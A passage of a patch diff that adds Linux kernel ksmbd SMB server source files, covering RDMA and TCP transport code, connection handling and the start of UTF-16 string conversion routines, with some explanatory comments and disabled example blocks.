++	return 0;
++}
++
++void ksmbd_rdma_destroy(void)
++{
++	if (!smb_direct_listener.cm_id)
++		return;
++
++	ib_unregister_client(&smb_direct_ib_client);
++	rdma_destroy_id(smb_direct_listener.cm_id);
++
++	smb_direct_listener.cm_id = NULL;
++
++	if (smb_direct_wq) {
++		destroy_workqueue(smb_direct_wq);
++		smb_direct_wq = NULL;
++	}
++}
++
++bool ksmbd_rdma_capable_netdev(struct net_device *netdev)
++{
++	struct smb_direct_device *smb_dev;
++	int i;
++	bool rdma_capable = false;
++
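++	/* First check whether the netdev belongs to a port of one of the
++	 * registered FRWR-capable IB devices; fall back to an RDMA core
++	 * lookup below if it does not.
++	 */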
++	read_lock(&smb_direct_device_lock);
++	list_for_each_entry(smb_dev, &smb_direct_device_list, list) {
++		for (i = 0; i < smb_dev->ib_dev->phys_port_cnt; i++) {
++			struct net_device *ndev;
++
++			ndev = smb_dev->ib_dev->ops.get_netdev(smb_dev->ib_dev,
++							       i + 1);
++			if (!ndev)
++				continue;
++
++			if (ndev == netdev) {
++				dev_put(ndev);
++				rdma_capable = true;
++				goto out;
++			}
++			dev_put(ndev);
++		}
++	}
++out:
++	read_unlock(&smb_direct_device_lock);
++
++	if (!rdma_capable) {
++		struct ib_device *ibdev;
++
++		ibdev = ib_device_get_by_netdev(netdev, RDMA_DRIVER_UNKNOWN);
++		if (ibdev) {
++			if (rdma_frwr_is_supported(&ibdev->attrs))
++				rdma_capable = true;
++			ib_device_put(ibdev);
++		}
++	}
++
++	return rdma_capable;
++}
++
++static struct ksmbd_transport_ops ksmbd_smb_direct_transport_ops = {
++	.prepare	= smb_direct_prepare,
++	.disconnect	= smb_direct_disconnect,
++	.shutdown	= smb_direct_shutdown,
++	.writev		= smb_direct_writev,
++	.read		= smb_direct_read,
++	.rdma_read	= smb_direct_rdma_read,
++	.rdma_write	= smb_direct_rdma_write,
++};
+diff --git a/fs/smb/server/transport_rdma.h b/fs/smb/server/transport_rdma.h
+new file mode 100644
+index 0000000000000..77aee4e5c9dcd
+--- /dev/null
++++ b/fs/smb/server/transport_rdma.h
+@@ -0,0 +1,69 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2017, Microsoft Corporation.
++ *   Copyright (C) 2018, LG Electronics.
++ */
++
++#ifndef __KSMBD_TRANSPORT_RDMA_H__
++#define __KSMBD_TRANSPORT_RDMA_H__
++
++#define SMBD_DEFAULT_IOSIZE (8 * 1024 * 1024)
++#define SMBD_MIN_IOSIZE (512 * 1024)
++#define SMBD_MAX_IOSIZE (16 * 1024 * 1024)
++
++/* SMB DIRECT negotiation request packet [MS-SMBD] 2.2.1 */
++struct smb_direct_negotiate_req {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++/* SMB DIRECT negotiation response packet [MS-SMBD] 2.2.2 */
++struct smb_direct_negotiate_resp {
++	__le16 min_version;
++	__le16 max_version;
++	__le16 negotiated_version;
++	__le16 reserved;
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le32 status;
++	__le32 max_readwrite_size;
++	__le32 preferred_send_size;
++	__le32 max_receive_size;
++	__le32 max_fragmented_size;
++} __packed;
++
++#define SMB_DIRECT_RESPONSE_REQUESTED 0x0001
++
++/* SMB DIRECT data transfer packet with payload [MS-SMBD] 2.2.3 */
++struct smb_direct_data_transfer {
++	__le16 credits_requested;
++	__le16 credits_granted;
++	__le16 flags;
++	__le16 reserved;
++	__le32 remaining_data_length;
++	__le32 data_offset;
++	__le32 data_length;
++	__le32 padding;
++	__u8 buffer[];
++} __packed;
++
++#ifdef CONFIG_SMB_SERVER_SMBDIRECT
++int ksmbd_rdma_init(void);
++void ksmbd_rdma_destroy(void);
++bool ksmbd_rdma_capable_netdev(struct net_device *netdev);
++void init_smbd_max_io_size(unsigned int sz);
++unsigned int get_smbd_max_read_write_size(void);
++#else
++static inline int ksmbd_rdma_init(void) { return 0; }
++static inline void ksmbd_rdma_destroy(void) { }
++static inline bool ksmbd_rdma_capable_netdev(struct net_device *netdev) { return false; }
++static inline void init_smbd_max_io_size(unsigned int sz) { }
++static inline unsigned int get_smbd_max_read_write_size(void) { return 0; }
++#endif
++
++#endif /* __KSMBD_TRANSPORT_RDMA_H__ */
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+new file mode 100644
+index 0000000000000..eff7a1d793f00
+--- /dev/null
++++ b/fs/smb/server/transport_tcp.c
+@@ -0,0 +1,649 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/freezer.h>
++
++#include "smb_common.h"
++#include "server.h"
++#include "auth.h"
++#include "connection.h"
++#include "transport_tcp.h"
++
++#define IFACE_STATE_DOWN		BIT(0)
++#define IFACE_STATE_CONFIGURED		BIT(1)
++
++static atomic_t active_num_conn;
++
++struct interface {
++	struct task_struct	*ksmbd_kthread;
++	struct socket		*ksmbd_socket;
++	struct list_head	entry;
++	char			*name;
++	struct mutex		sock_release_lock;
++	int			state;
++};
++
++static LIST_HEAD(iface_list);
++
++static int bind_additional_ifaces;
++
++struct tcp_transport {
++	struct ksmbd_transport		transport;
++	struct socket			*sock;
++	struct kvec			*iov;
++	unsigned int			nr_iov;
++};
++
++static struct ksmbd_transport_ops ksmbd_tcp_transport_ops;
++
++static void tcp_stop_kthread(struct task_struct *kthread);
++static struct interface *alloc_iface(char *ifname);
++
++#define KSMBD_TRANS(t)	(&(t)->transport)
++#define TCP_TRANS(t)	((struct tcp_transport *)container_of(t, \
++				struct tcp_transport, transport))
++
++static inline void ksmbd_tcp_nodelay(struct socket *sock)
++{
++	tcp_sock_set_nodelay(sock->sk);
++}
++
++static inline void ksmbd_tcp_reuseaddr(struct socket *sock)
++{
++	sock_set_reuseaddr(sock->sk);
++}
++
++static inline void ksmbd_tcp_rcv_timeout(struct socket *sock, s64 secs)
++{
++	lock_sock(sock->sk);
++	if (secs && secs < MAX_SCHEDULE_TIMEOUT / HZ - 1)
++		sock->sk->sk_rcvtimeo = secs * HZ;
++	else
++		sock->sk->sk_rcvtimeo = MAX_SCHEDULE_TIMEOUT;
++	release_sock(sock->sk);
++}
++
++static inline void ksmbd_tcp_snd_timeout(struct socket *sock, s64 secs)
++{
++	sock_set_sndtimeo(sock->sk, secs);
++}
++
++static struct tcp_transport *alloc_transport(struct socket *client_sk)
++{
++	struct tcp_transport *t;
++	struct ksmbd_conn *conn;
++
++	t = kzalloc(sizeof(*t), GFP_KERNEL);
++	if (!t)
++		return NULL;
++	t->sock = client_sk;
++
++	conn = ksmbd_conn_alloc();
++	if (!conn) {
++		kfree(t);
++		return NULL;
++	}
++
++	conn->transport = KSMBD_TRANS(t);
++	KSMBD_TRANS(t)->conn = conn;
++	KSMBD_TRANS(t)->ops = &ksmbd_tcp_transport_ops;
++	return t;
++}
++
++static void free_transport(struct tcp_transport *t)
++{
++	kernel_sock_shutdown(t->sock, SHUT_RDWR);
++	sock_release(t->sock);
++	t->sock = NULL;
++
++	ksmbd_conn_free(KSMBD_TRANS(t)->conn);
++	kfree(t->iov);
++	kfree(t);
++}
++
++/**
++ * kvec_array_init() - initialize an IO vector segment
++ * @new:	IO vector to be initialized
++ * @iov:	base IO vector
++ * @nr_segs:	number of segments in base iov
++ * @bytes:	number of bytes already consumed from the base iov
++ *
++ * Return:	Number of IO segments
++ */
++static unsigned int kvec_array_init(struct kvec *new, struct kvec *iov,
++				    unsigned int nr_segs, size_t bytes)
++{
++	size_t base = 0;
++
++	while (bytes || !iov->iov_len) {
++		int copy = min(bytes, iov->iov_len);
++
++		bytes -= copy;
++		base += copy;
++		if (iov->iov_len == base) {
++			iov++;
++			nr_segs--;
++			base = 0;
++		}
++	}
++
++	memcpy(new, iov, sizeof(*iov) * nr_segs);
++	new->iov_base += base;
++	new->iov_len -= base;
++	return nr_segs;
++}
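++
++/*
++ * For illustration: with a base iov of {{A, 3}, {B, 5}} and bytes = 4,
++ * the loop above consumes all of A and one byte of B, so the function
++ * returns nr_segs = 1 with new = {{B + 1, 4}} -- the unread tail of the
++ * original vector.
++ */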
++
++/**
++ * get_conn_iovec() - get connection iovec for reading from socket
++ * @t:		TCP transport instance
++ * @nr_segs:	number of segments in iov
++ *
++ * Return:	existing iovec if big enough, otherwise a newly allocated one
++ */
++static struct kvec *get_conn_iovec(struct tcp_transport *t, unsigned int nr_segs)
++{
++	struct kvec *new_iov;
++
++	if (t->iov && nr_segs <= t->nr_iov)
++		return t->iov;
++
++	/* not big enough -- allocate a new one and release the old */
++	new_iov = kmalloc_array(nr_segs, sizeof(*new_iov), GFP_KERNEL);
++	if (new_iov) {
++		kfree(t->iov);
++		t->iov = new_iov;
++		t->nr_iov = nr_segs;
++	}
++	return new_iov;
++}
++
++static unsigned short ksmbd_tcp_get_port(const struct sockaddr *sa)
++{
++	switch (sa->sa_family) {
++	case AF_INET:
++		return ntohs(((struct sockaddr_in *)sa)->sin_port);
++	case AF_INET6:
++		return ntohs(((struct sockaddr_in6 *)sa)->sin6_port);
++	}
++	return 0;
++}
++
++/**
++ * ksmbd_tcp_new_connection() - create a new tcp session on mount
++ * @client_sk:	socket associated with new connection
++ *
++ * Whenever a new connection is requested, create a conn thread
++ * (session thread) to handle incoming SMB requests from the connection.
++ *
++ * Return:	0 on success, otherwise error
++ */
++static int ksmbd_tcp_new_connection(struct socket *client_sk)
++{
++	struct sockaddr *csin;
++	int rc = 0;
++	struct tcp_transport *t;
++
++	t = alloc_transport(client_sk);
++	if (!t) {
++		sock_release(client_sk);
++		return -ENOMEM;
++	}
++
++	csin = KSMBD_TCP_PEER_SOCKADDR(KSMBD_TRANS(t)->conn);
++	if (kernel_getpeername(client_sk, csin) < 0) {
++		pr_err("client IP resolution failed\n");
++		rc = -EINVAL;
++		goto out_error;
++	}
++
++	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
++					      KSMBD_TRANS(t)->conn,
++					      "ksmbd:%u",
++					      ksmbd_tcp_get_port(csin));
++	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
++		pr_err("cannot start conn thread\n");
++		rc = PTR_ERR(KSMBD_TRANS(t)->handler);
++		free_transport(t);
++	}
++	return rc;
++
++out_error:
++	free_transport(t);
++	return rc;
++}
++
++/**
++ * ksmbd_kthread_fn() - listen for new SMB connections and call back into the server
++ * @p:		interface to accept connections on
++ *
++ * Return:	0 on success, error number otherwise
++ */
++static int ksmbd_kthread_fn(void *p)
++{
++	struct socket *client_sk = NULL;
++	struct interface *iface = (struct interface *)p;
++	int ret;
++
++	while (!kthread_should_stop()) {
++		mutex_lock(&iface->sock_release_lock);
++		if (!iface->ksmbd_socket) {
++			mutex_unlock(&iface->sock_release_lock);
++			break;
++		}
++		ret = kernel_accept(iface->ksmbd_socket, &client_sk,
++				    SOCK_NONBLOCK);
++		mutex_unlock(&iface->sock_release_lock);
++		if (ret) {
++			if (ret == -EAGAIN)
++				/* check for new connections every 100 msecs */
++				schedule_timeout_interruptible(HZ / 10);
++			continue;
++		}
++
++		if (server_conf.max_connections &&
++		    atomic_inc_return(&active_num_conn) >= server_conf.max_connections) {
++			pr_info_ratelimited("Reached the maximum number of connections (%u), rejecting\n",
++					    atomic_read(&active_num_conn));
++			atomic_dec(&active_num_conn);
++			sock_release(client_sk);
++			continue;
++		}
++
++		ksmbd_debug(CONN, "connect success: accepted new connection\n");
++		client_sk->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
++		client_sk->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
++
++		ksmbd_tcp_new_connection(client_sk);
++	}
++
++	ksmbd_debug(CONN, "releasing socket\n");
++	return 0;
++}
++
++/**
++ * ksmbd_tcp_run_kthread() - start forker thread
++ * @iface: pointer to struct interface
++ *
++ * start a forker thread (ksmbd-<ifname>) per interface to listen
++ * on port 445 for new SMB connection requests. It creates per-connection
++ * server threads (ksmbd:<port>).
++ *
++ * Return:	0 on success or error number
++ */
++static int ksmbd_tcp_run_kthread(struct interface *iface)
++{
++	int rc;
++	struct task_struct *kthread;
++
++	kthread = kthread_run(ksmbd_kthread_fn, (void *)iface, "ksmbd-%s",
++			      iface->name);
++	if (IS_ERR(kthread)) {
++		rc = PTR_ERR(kthread);
++		return rc;
++	}
++	iface->ksmbd_kthread = kthread;
++
++	return 0;
++}
++
++/**
++ * ksmbd_tcp_readv() - read data from socket in given iovec
++ * @t:			TCP transport instance
++ * @iov_orig:		base IO vector
++ * @nr_segs:		number of segments in base iov
++ * @to_read:		number of bytes to read from socket
++ * @max_retries:	maximum retry count
++ *
++ * Return:	on success return number of bytes read from socket,
++ *		otherwise return error number
++ */
++static int ksmbd_tcp_readv(struct tcp_transport *t, struct kvec *iov_orig,
++			   unsigned int nr_segs, unsigned int to_read,
++			   int max_retries)
++{
++	int length = 0;
++	int total_read;
++	unsigned int segs;
++	struct msghdr ksmbd_msg;
++	struct kvec *iov;
++	struct ksmbd_conn *conn = KSMBD_TRANS(t)->conn;
++
++	iov = get_conn_iovec(t, nr_segs);
++	if (!iov)
++		return -ENOMEM;
++
++	ksmbd_msg.msg_control = NULL;
++	ksmbd_msg.msg_controllen = 0;
++
++	for (total_read = 0; to_read; total_read += length, to_read -= length) {
++		try_to_freeze();
++
++		if (!ksmbd_conn_alive(conn)) {
++			total_read = -ESHUTDOWN;
++			break;
++		}
++		segs = kvec_array_init(iov, iov_orig, nr_segs, total_read);
++
++		length = kernel_recvmsg(t->sock, &ksmbd_msg,
++					iov, segs, to_read, 0);
++
++		if (length == -EINTR) {
++			total_read = -ESHUTDOWN;
++			break;
++		} else if (ksmbd_conn_need_reconnect(conn)) {
++			total_read = -EAGAIN;
++			break;
++		} else if (length == -ERESTARTSYS || length == -EAGAIN) {
++			/*
++			 * If max_retries is negative, allow unlimited
++			 * retries to keep connection with inactive sessions.
++			 */
++			if (max_retries == 0) {
++				total_read = length;
++				break;
++			} else if (max_retries > 0) {
++				max_retries--;
++			}
++
++			usleep_range(1000, 2000);
++			length = 0;
++			continue;
++		} else if (length <= 0) {
++			total_read = length;
++			break;
++		}
++	}
++	return total_read;
++}
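++
++/*
++ * Retry policy in short: max_retries < 0 retries -ERESTARTSYS/-EAGAIN
++ * forever (keeps connections with inactive sessions alive), 0 fails
++ * immediately, and a positive value bounds the retries, sleeping 1-2 ms
++ * between attempts.
++ */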
++
++/**
++ * ksmbd_tcp_read() - read data from socket in given buffer
++ * @t:		TCP transport instance
++ * @buf:	buffer to store read data from socket
++ * @to_read:	number of bytes to read from socket
++ * @max_retries:	maximum retry count (negative means retry forever)
++ *
++ * Return:	on success return number of bytes read from socket,
++ *		otherwise return error number
++ */
++static int ksmbd_tcp_read(struct ksmbd_transport *t, char *buf,
++			  unsigned int to_read, int max_retries)
++{
++	struct kvec iov;
++
++	iov.iov_base = buf;
++	iov.iov_len = to_read;
++
++	return ksmbd_tcp_readv(TCP_TRANS(t), &iov, 1, to_read, max_retries);
++}
++
++static int ksmbd_tcp_writev(struct ksmbd_transport *t, struct kvec *iov,
++			    int nvecs, int size, bool need_invalidate,
++			    unsigned int remote_key)
++{
++	struct msghdr smb_msg = {.msg_flags = MSG_NOSIGNAL};
++
++	return kernel_sendmsg(TCP_TRANS(t)->sock, &smb_msg, iov, nvecs, size);
++}
++
++static void ksmbd_tcp_disconnect(struct ksmbd_transport *t)
++{
++	free_transport(TCP_TRANS(t));
++	if (server_conf.max_connections)
++		atomic_dec(&active_num_conn);
++}
++
++static void tcp_destroy_socket(struct socket *ksmbd_socket)
++{
++	int ret;
++
++	if (!ksmbd_socket)
++		return;
++
++	/* set timeouts to zero */
++	ksmbd_tcp_rcv_timeout(ksmbd_socket, 0);
++	ksmbd_tcp_snd_timeout(ksmbd_socket, 0);
++
++	ret = kernel_sock_shutdown(ksmbd_socket, SHUT_RDWR);
++	if (ret)
++		pr_err("Failed to shutdown socket: %d\n", ret);
++	sock_release(ksmbd_socket);
++}
++
++/**
++ * create_socket() - create the listening socket for an interface
++ * @iface:	interface to listen on
++ *
++ * Return:	0 on success, error number otherwise
++ */
++static int create_socket(struct interface *iface)
++{
++	int ret;
++	struct sockaddr_in6 sin6;
++	struct sockaddr_in sin;
++	struct socket *ksmbd_socket;
++	bool ipv4 = false;
++
++	ret = sock_create(PF_INET6, SOCK_STREAM, IPPROTO_TCP, &ksmbd_socket);
++	if (ret) {
++		if (ret != -EAFNOSUPPORT)
++			pr_err("Can't create socket for ipv6, fallback to ipv4: %d\n", ret);
++		ret = sock_create(PF_INET, SOCK_STREAM, IPPROTO_TCP,
++				  &ksmbd_socket);
++		if (ret) {
++			pr_err("Can't create socket for ipv4: %d\n", ret);
++			goto out_clear;
++		}
++
++		sin.sin_family = PF_INET;
++		sin.sin_addr.s_addr = htonl(INADDR_ANY);
++		sin.sin_port = htons(server_conf.tcp_port);
++		ipv4 = true;
++	} else {
++		sin6.sin6_family = PF_INET6;
++		sin6.sin6_addr = in6addr_any;
++		sin6.sin6_port = htons(server_conf.tcp_port);
++	}
++
++	ksmbd_tcp_nodelay(ksmbd_socket);
++	ksmbd_tcp_reuseaddr(ksmbd_socket);
++
++	ret = sock_setsockopt(ksmbd_socket,
++			      SOL_SOCKET,
++			      SO_BINDTODEVICE,
++			      KERNEL_SOCKPTR(iface->name),
++			      strlen(iface->name));
++	if (ret != -ENODEV && ret < 0) {
++		pr_err("Failed to set SO_BINDTODEVICE: %d\n", ret);
++		goto out_error;
++	}
++
++	if (ipv4)
++		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin,
++				  sizeof(sin));
++	else
++		ret = kernel_bind(ksmbd_socket, (struct sockaddr *)&sin6,
++				  sizeof(sin6));
++	if (ret) {
++		pr_err("Failed to bind socket: %d\n", ret);
++		goto out_error;
++	}
++
++	ksmbd_socket->sk->sk_rcvtimeo = KSMBD_TCP_RECV_TIMEOUT;
++	ksmbd_socket->sk->sk_sndtimeo = KSMBD_TCP_SEND_TIMEOUT;
++
++	ret = kernel_listen(ksmbd_socket, KSMBD_SOCKET_BACKLOG);
++	if (ret) {
++		pr_err("Port listen() error: %d\n", ret);
++		goto out_error;
++	}
++
++	iface->ksmbd_socket = ksmbd_socket;
++	ret = ksmbd_tcp_run_kthread(iface);
++	if (ret) {
++		pr_err("Can't start ksmbd main kthread: %d\n", ret);
++		goto out_error;
++	}
++	iface->state = IFACE_STATE_CONFIGURED;
++
++	return 0;
++
++out_error:
++	tcp_destroy_socket(ksmbd_socket);
++out_clear:
++	iface->ksmbd_socket = NULL;
++	return ret;
++}
++
++static int ksmbd_netdev_event(struct notifier_block *nb, unsigned long event,
++			      void *ptr)
++{
++	struct net_device *netdev = netdev_notifier_info_to_dev(ptr);
++	struct interface *iface;
++	int ret, found = 0;
++
++	switch (event) {
++	case NETDEV_UP:
++		if (netif_is_bridge_port(netdev))
++			return NOTIFY_OK;
++
++		list_for_each_entry(iface, &iface_list, entry) {
++			if (!strcmp(iface->name, netdev->name)) {
++				found = 1;
++				if (iface->state != IFACE_STATE_DOWN)
++					break;
++				ret = create_socket(iface);
++				if (ret)
++					return NOTIFY_OK;
++				break;
++			}
++		}
++		if (!found && bind_additional_ifaces) {
++			iface = alloc_iface(kstrdup(netdev->name, GFP_KERNEL));
++			if (!iface)
++				return NOTIFY_OK;
++			ret = create_socket(iface);
++			if (ret)
++				break;
++		}
++		break;
++	case NETDEV_DOWN:
++		list_for_each_entry(iface, &iface_list, entry) {
++			if (!strcmp(iface->name, netdev->name) &&
++			    iface->state == IFACE_STATE_CONFIGURED) {
++				tcp_stop_kthread(iface->ksmbd_kthread);
++				iface->ksmbd_kthread = NULL;
++				mutex_lock(&iface->sock_release_lock);
++				tcp_destroy_socket(iface->ksmbd_socket);
++				iface->ksmbd_socket = NULL;
++				mutex_unlock(&iface->sock_release_lock);
++
++				iface->state = IFACE_STATE_DOWN;
++				break;
++			}
++		}
++		break;
++	}
++
++	return NOTIFY_DONE;
++}
++
++static struct notifier_block ksmbd_netdev_notifier = {
++	.notifier_call = ksmbd_netdev_event,
++};
++
++int ksmbd_tcp_init(void)
++{
++	register_netdevice_notifier(&ksmbd_netdev_notifier);
++
++	return 0;
++}
++
++static void tcp_stop_kthread(struct task_struct *kthread)
++{
++	int ret;
++
++	if (!kthread)
++		return;
++
++	ret = kthread_stop(kthread);
++	if (ret)
++		pr_err("failed to stop forker thread\n");
++}
++
++void ksmbd_tcp_destroy(void)
++{
++	struct interface *iface, *tmp;
++
++	unregister_netdevice_notifier(&ksmbd_netdev_notifier);
++
++	list_for_each_entry_safe(iface, tmp, &iface_list, entry) {
++		list_del(&iface->entry);
++		kfree(iface->name);
++		kfree(iface);
++	}
++}
++
++static struct interface *alloc_iface(char *ifname)
++{
++	struct interface *iface;
++
++	if (!ifname)
++		return NULL;
++
++	iface = kzalloc(sizeof(struct interface), GFP_KERNEL);
++	if (!iface) {
++		kfree(ifname);
++		return NULL;
++	}
++
++	iface->name = ifname;
++	iface->state = IFACE_STATE_DOWN;
++	list_add(&iface->entry, &iface_list);
++	mutex_init(&iface->sock_release_lock);
++	return iface;
++}
++
++int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz)
++{
++	int sz = 0;
++
++	if (!ifc_list_sz) {
++		struct net_device *netdev;
++
++		rtnl_lock();
++		for_each_netdev(&init_net, netdev) {
++			if (netif_is_bridge_port(netdev))
++				continue;
++			if (!alloc_iface(kstrdup(netdev->name, GFP_KERNEL))) {
++				rtnl_unlock();
++				return -ENOMEM;
++			}
++		}
++		rtnl_unlock();
++		bind_additional_ifaces = 1;
++		return 0;
++	}
++
++	while (ifc_list_sz > 0) {
++		if (!alloc_iface(kstrdup(ifc_list, GFP_KERNEL)))
++			return -ENOMEM;
++
++		sz = strlen(ifc_list);
++		if (!sz)
++			break;
++
++		ifc_list += sz + 1;
++		ifc_list_sz -= (sz + 1);
++	}
++
++	bind_additional_ifaces = 0;
++
++	return 0;
++}
++
++static struct ksmbd_transport_ops ksmbd_tcp_transport_ops = {
++	.read		= ksmbd_tcp_read,
++	.writev		= ksmbd_tcp_writev,
++	.disconnect	= ksmbd_tcp_disconnect,
++};
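++
++/*
++ * Usage sketch for ksmbd_tcp_set_interfaces() (the buffer contents are an
++ * assumption for illustration): the list is a concatenation of
++ * NUL-terminated interface names.
++ */
++#if 0	/* example only */
++static char example_ifc_buf[] = "eth0\0eth1";
++
++static int example_bind_ifaces(void)
++{
++	/* sizeof() includes the trailing NUL of "eth1" */
++	return ksmbd_tcp_set_interfaces(example_ifc_buf, sizeof(example_ifc_buf));
++}
++#endif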
+diff --git a/fs/smb/server/transport_tcp.h b/fs/smb/server/transport_tcp.h
+new file mode 100644
+index 0000000000000..e338bebe322f1
+--- /dev/null
++++ b/fs/smb/server/transport_tcp.h
+@@ -0,0 +1,13 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_TRANSPORT_TCP_H__
++#define __KSMBD_TRANSPORT_TCP_H__
++
++int ksmbd_tcp_set_interfaces(char *ifc_list, int ifc_list_sz);
++int ksmbd_tcp_init(void);
++void ksmbd_tcp_destroy(void);
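++
++/*
++ * Expected bring-up order (sketch; example_tcp_bringup is hypothetical):
++ * build iface_list first, then register the notifier -- notifier
++ * registration replays NETDEV_UP for devices that are already up, which
++ * triggers create_socket() per configured interface.
++ */
++#if 0	/* example only */
++static int example_tcp_bringup(char *ifc_list, int ifc_list_sz)
++{
++	int ret = ksmbd_tcp_set_interfaces(ifc_list, ifc_list_sz);
++
++	if (ret)
++		return ret;
++	return ksmbd_tcp_init();
++}
++#endif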
++
++#endif /* __KSMBD_TRANSPORT_TCP_H__ */
+diff --git a/fs/smb/server/unicode.c b/fs/smb/server/unicode.c
+new file mode 100644
+index 0000000000000..a0db699ddafda
+--- /dev/null
++++ b/fs/smb/server/unicode.c
+@@ -0,0 +1,384 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ *   Some of the source code in this file came from fs/cifs/cifs_unicode.c
++ *
++ *   Copyright (c) International Business Machines  Corp., 2000,2009
++ *   Modified by Steve French (sfrench@us.ibm.com)
++ *   Modified by Namjae Jeon (linkinjeon@kernel.org)
++ */
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <asm/unaligned.h>
++#include "glob.h"
++#include "unicode.h"
++#include "uniupr.h"
++#include "smb_common.h"
++
++/*
++ * smb_utf16_bytes() - how long will a string be after conversion?
++ * @from:	pointer to input string
++ * @maxbytes:	don't go past this many bytes of input string
++ * @codepage:	destination codepage
++ *
++ * Walk a utf16le string and return the number of bytes that the string will
++ * be after being converted to the given charset, not including any null
++ * termination required. Don't walk past maxbytes in the source buffer.
++ *
++ * Return:	string length after conversion
++ */
++static int smb_utf16_bytes(const __le16 *from, int maxbytes,
++			   const struct nls_table *codepage)
++{
++	int i;
++	int charlen, outlen = 0;
++	int maxwords = maxbytes / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp;
++
++	for (i = 0; i < maxwords; i++) {
++		ftmp = get_unaligned_le16(&from[i]);
++		if (ftmp == 0)
++			break;
++
++		charlen = codepage->uni2char(ftmp, tmp, NLS_MAX_CHARSET_SIZE);
++		if (charlen > 0)
++			outlen += charlen;
++		else
++			outlen++;
++	}
++
++	return outlen;
++}
++
++/*
++ * cifs_mapchar() - convert a host-endian char to proper char in codepage
++ * @target:	where converted character should be copied
++ * @src_char:	2 byte host-endian source character
++ * @cp:		codepage to which character should be converted
++ * @mapchar:	should character be mapped according to the mapchars mount option?
++ *
++ * This function handles the conversion of a single character. It is the
++ * responsibility of the caller to ensure that the target buffer is large
++ * enough to hold the result of the conversion (at least NLS_MAX_CHARSET_SIZE).
++ *
++ * Return:	string length after conversion
++ */
++static int
++cifs_mapchar(char *target, const __u16 src_char, const struct nls_table *cp,
++	     bool mapchar)
++{
++	int len = 1;
++
++	if (!mapchar)
++		goto cp_convert;
++
++	/*
++	 * BB: Cannot handle remapping UNI_SLASH until all the calls to
++	 *     build_path_from_dentry are modified, as they use slash as
++	 *     separator.
++	 */
++	switch (src_char) {
++	case UNI_COLON:
++		*target = ':';
++		break;
++	case UNI_ASTERISK:
++		*target = '*';
++		break;
++	case UNI_QUESTION:
++		*target = '?';
++		break;
++	case UNI_PIPE:
++		*target = '|';
++		break;
++	case UNI_GRTRTHAN:
++		*target = '>';
++		break;
++	case UNI_LESSTHAN:
++		*target = '<';
++		break;
++	default:
++		goto cp_convert;
++	}
++
++out:
++	return len;
++
++cp_convert:
++	len = cp->uni2char(src_char, target, NLS_MAX_CHARSET_SIZE);
++	if (len <= 0) {
++		*target = '?';
++		len = 1;
++	}
++
++	goto out;
++}
++
++/*
++ * is_char_allowed() - check for valid character
++ * @ch:		input character to be checked
++ *
++ * Return:	1 if char is allowed, otherwise 0
++ */
++static inline int is_char_allowed(char *ch)
++{
++	/* check for control chars, wildcards etc. */
++	if (!(*ch & 0x80) &&
++	    (*ch <= 0x1f ||
++	     *ch == '?' || *ch == '"' || *ch == '<' ||
++	     *ch == '>' || *ch == '|'))
++		return 0;
++
++	return 1;
++}
++
++/*
++ * smb_from_utf16() - convert utf16le string to local charset
++ * @to:		destination buffer
++ * @from:	source buffer
++ * @tolen:	destination buffer size (in bytes)
++ * @fromlen:	source buffer size (in bytes)
++ * @codepage:	codepage to which characters should be converted
++ * @mapchar:	should characters be remapped according to the mapchars option?
++ *
++ * Convert a little-endian utf16le string (as sent by the server) to a string
++ * in the provided codepage. The tolen and fromlen parameters are to ensure
++ * that the code doesn't walk off of the end of the buffer (which is always
++ * a danger if the alignment of the source buffer is off). The destination
++ * string is always properly null terminated and fits in the destination
++ * buffer. Returns the length of the destination string in bytes (including
++ * null terminator).
++ *
++ * Note that some Windows versions actually send multiword UTF-16 characters
++ * instead of straight UCS-2. The Linux NLS routines however aren't able to
++ * deal with those characters properly. In the event that we get some of
++ * those characters, they won't be translated properly.
++ *
++ * Return:	string length after conversion
++ */
++static int smb_from_utf16(char *to, const __le16 *from, int tolen, int fromlen,
++			  const struct nls_table *codepage, bool mapchar)
++{
++	int i, charlen, safelen;
++	int outlen = 0;
++	int nullsize = nls_nullsize(codepage);
++	int fromwords = fromlen / 2;
++	char tmp[NLS_MAX_CHARSET_SIZE];
++	__u16 ftmp;
++
++	/*
++	 * Because the chars can be of varying widths, we need to take care
++	 * not to overflow the destination buffer when we get close to the
++	 * end of it. Until we reach this offset, however, no overflow
++	 * check is needed.
++	 */
++	safelen = tolen - (NLS_MAX_CHARSET_SIZE + nullsize);
++
++	for (i = 0; i < fromwords; i++) {
++		ftmp = get_unaligned_le16(&from[i]);
++		if (ftmp == 0)
++			break;
++
++		/*
++		 * check to see if converting this character might make the
++		 * conversion bleed into the null terminator
++		 */
++		if (outlen >= safelen) {
++			charlen = cifs_mapchar(tmp, ftmp, codepage, mapchar);
++			if ((outlen + charlen) > (tolen - nullsize))
++				break;
++		}
++
++		/* put converted char into 'to' buffer */
++		charlen = cifs_mapchar(&to[outlen], ftmp, codepage, mapchar);
++		outlen += charlen;
++	}
++
++	/* properly null-terminate string */
++	for (i = 0; i < nullsize; i++)
++		to[outlen++] = 0;
++
++	return outlen;
++}
++
++/*
++ * smb_strtoUTF16() - Convert character string to unicode string
++ * @to:		destination buffer
++ * @from:	source buffer
++ * @len:	destination buffer size (in bytes)
++ * @codepage:	codepage to which characters should be converted
++ *
